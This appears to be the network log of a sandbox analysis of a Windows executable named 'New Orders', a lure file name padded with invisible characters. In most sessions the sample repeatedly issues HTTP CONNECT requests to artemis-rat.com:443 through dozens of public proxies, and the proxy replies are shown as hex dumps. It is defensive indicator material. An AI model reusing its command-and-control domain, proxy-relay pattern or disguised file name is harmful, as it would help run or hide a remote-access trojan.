                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1276192.168.2.95124285.193.93.7331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.827763081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.976411104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.125382900 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1277192.168.2.953059176.98.81.8580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.832787037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1278192.168.2.951308103.90.227.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.855199099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.811245918 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1279192.168.2.9537653.12.144.14631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.855650902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.072472095 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1280192.168.2.953833104.23.141.196807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.855808973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.010610104 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1281192.168.2.95381823.94.123.20288887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.856282949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.760026932 CET84INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Transfer-Encoding: chunked


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1282192.168.2.953839104.16.230.163807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.856601000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.011291027 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1283192.168.2.951271119.91.214.11933897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.856862068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.945332050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1284192.168.2.95308795.71.125.50608677672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.860167027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1285192.168.2.953711115.84.248.14080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.860168934 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:45.170614004 CET1286INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Content-Length: 3172
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                                                                                        Mar 11, 2024 16:16:45.618549109 CET454INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                        Content-Length: 226
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1286192.168.2.95376138.156.233.769997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.875443935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.436664104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242268085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742216110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.539146900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1287192.168.2.953705192.162.232.1510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.875866890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1288192.168.2.95377972.10.160.17128817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.876164913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.412553072 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1289192.168.2.95370331.134.151.40807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.876334906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1290192.168.2.953713185.49.30.580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.878788948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1291192.168.2.953007222.220.102.15980007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.879772902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.258904934 CET536INHTTP/1.1 502 Bad Gateway
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:17:15 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 556
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE a


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1292192.168.2.953605122.114.232.1378087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.888027906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1293192.168.2.95312274.118.80.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.893588066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1294192.168.2.952814183.234.215.1184437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.893943071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.976504087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.976939917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.976516008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.617481947 CET716INHTTP/1.1 405 Not Allowed
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:56 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 559
                                                                                        Connection: keep-alive
